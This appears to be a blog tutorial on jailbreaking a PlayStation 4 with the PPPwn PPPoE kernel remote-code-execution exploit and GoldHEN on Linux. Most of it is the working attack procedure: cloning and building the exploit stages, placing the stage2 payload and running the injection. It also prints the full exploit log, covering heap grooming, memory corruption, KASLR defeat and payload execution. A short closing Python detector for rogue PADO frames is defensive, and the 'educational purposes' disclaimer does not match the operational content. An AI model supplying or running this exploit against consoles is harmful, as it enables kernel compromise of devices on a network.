How someone could jailbreak your PlayStation 4 using PPPwn
This tutorial covers using PPPwn on Linux and installing GoldHEN on a PS4.
PPPwn is a kernel remote code execution exploit for PlayStation 4 consoles up to firmware 11.00. The code below is a modified proof-of-concept exploit for CVE-2006-4304 that was reported to PlayStation. This section guides you through the installation and usage of PPPwn on a Linux system.
Before you begin, ensure you have the following:
First, update your system's package list and upgrade any outdated packages. Then install git, python3 and gcc.
sudo apt update
sudo apt upgrade
sudo apt install -y git python3 gcc
Next, clone the PPPwn repository from GitHub.
git clone --recursive https://github.com/TheOfficialFloW/PPPwn
cd PPPwn
Install the required Python packages using pip.
sudo pip install -r requirements.txt
Then build stage1 for your console's firmware version.
make -C stage1 FW=YOURFWVERSION clean && make -C stage1 FW=YOURFWVERSION
Replace YOURFWVERSION with your PS4's firmware version (for example: 1100, 900, ...).
Now go to https://github.com/GoldHEN/GoldHEN/releases, open the Assets section of the latest pre-release and download the archive.
After you've downloaded the .7z file, open the pppwn_stage2 folder inside it and select the .bin that matches your firmware. Then move that .bin to .../PPPwn/stage2/ and rename it to stage2.bin.
The archive also contains a file named goldhen.bin, which you have to copy to the root directory of an exFAT-formatted USB stick.
Now you will need to do the following on your PS4:
After you have done all of that, press the Test Internet Connection button on the PS4 and run the following command at the same time:
sudo python3 pppwn.py --interface=YOURINTERFACE --fw=YOURFWVERSION
Replace YOURINTERFACE with your network interface (for example: eth0) and YOURFWVERSION with your firmware version.
ALWAYS wait for the console to show the message "Cannot connect to network: (NW-31274-7)" before retrying this PPPoE injection. A successful run produces output like the following:
[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=eth0 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin
[+] STAGE 0: Initialization
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 07:ba:be:34:d6:ab
[+] AC cookie length: 0x4e0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::2d9:d1ff:febc:83e4
[+] Heap grooming...done
[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[*] Sending malicious LCP configure request...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141
[+] STAGE 2: KASLR defeat
[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff884de578
[+] kaslr_offset: 0x3ffc000
[+] STAGE 3: Remote code execution
[*] Sending LCP terminate request...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 97:df:ea:86:ff:ff
[+] AC cookie length: 0x511
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Triggering code execution...
[*] Waiting for stage1 to resume...
[*] Sending PADT...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634be9200
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] AC cookie length: 0x0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[+] STAGE 4: Arbitrary payload execution
[*] Sending stage2 payload...
[+] Done!
Keep in mind that it can take up to 30 attempts of repeating the process before the exploit finally succeeds!
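The log above is a PPPoE discovery handshake in which the attacking host answers the console's PADI with a PADO carrying an unusually large AC-Cookie (0x4e0 and 0x511 bytes in the log). As an added, defender-side example that is not part of the original tutorial or the PPPwn project, the Python below parses PPPoE Discovery frames (EtherType 0x8863, RFC 2516) and flags PADO frames that come from an access-concentrator MAC outside an allow-list or that carry an AC-Cookie larger than a threshold; the sample frames, the allow-list and the 64-byte threshold are constructed assumptions.

```python
"""Flag suspicious PPPoE discovery traffic on a LAN (constructed example)."""
import struct

ETH_PPPOE_DISC = 0x8863                       # PPPoE Discovery EtherType
CODE = {0x09: "PADI", 0x07: "PADO", 0x19: "PADR", 0x65: "PADS", 0xA7: "PADT"}
TAG_AC_COOKIE = 0x0104                        # RFC 2516 AC-Cookie tag
COOKIE_THRESHOLD = 64  # bytes; assumed upper bound for a legitimate cookie


def parse_pppoe_discovery(frame: bytes):
    """Return (src_mac, code_name, {tag_type: value}) or None if not PPPoE-D."""
    if len(frame) < 20:
        return None
    src = frame[6:12]
    if struct.unpack("!H", frame[12:14])[0] != ETH_PPPOE_DISC:
        return None
    vt, code, _session, length = struct.unpack("!BBHH", frame[14:20])
    if vt != 0x11:                            # version 1, type 1
        return None
    payload, tags, off = frame[20:20 + length], {}, 0
    while off + 4 <= len(payload):            # walk the TLV tag list
        ttype, tlen = struct.unpack("!HH", payload[off:off + 4])
        tags[ttype] = payload[off + 4:off + 4 + tlen]
        off += 4 + tlen
    return src.hex(":"), CODE.get(code, f"0x{code:02x}"), tags


def check_frame(frame: bytes, known_acs) -> list:
    """Return alert strings for one frame; empty list if nothing looks odd."""
    parsed = parse_pppoe_discovery(frame)
    if parsed is None:
        return []
    src, code, tags = parsed
    alerts = []
    if code == "PADO":                        # only an AC should ever send PADO
        if src not in known_acs:
            alerts.append(f"PADO from unknown access concentrator {src}")
        cookie = tags.get(TAG_AC_COOKIE, b"")
        if len(cookie) > COOKIE_THRESHOLD:
            alerts.append(f"oversized AC-Cookie ({len(cookie)} bytes) from {src}")
    return alerts


def build_pado(src_mac: bytes, cookie: bytes) -> bytes:
    """Construct a sample PADO frame for testing (not captured traffic)."""
    tag = struct.pack("!HH", TAG_AC_COOKIE, len(cookie)) + cookie
    hdr = struct.pack("!BBHH", 0x11, 0x07, 0, len(tag))
    console_mac = bytes.fromhex("001122334455")   # placeholder destination
    return console_mac + src_mac + struct.pack("!H", ETH_PPPOE_DISC) + hdr + tag
```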
For educational purposes only. We do not condone any illegal activity. This tutorial is meant to teach people how to prevent attackers from hacking their PS4 consoles and stealing their data.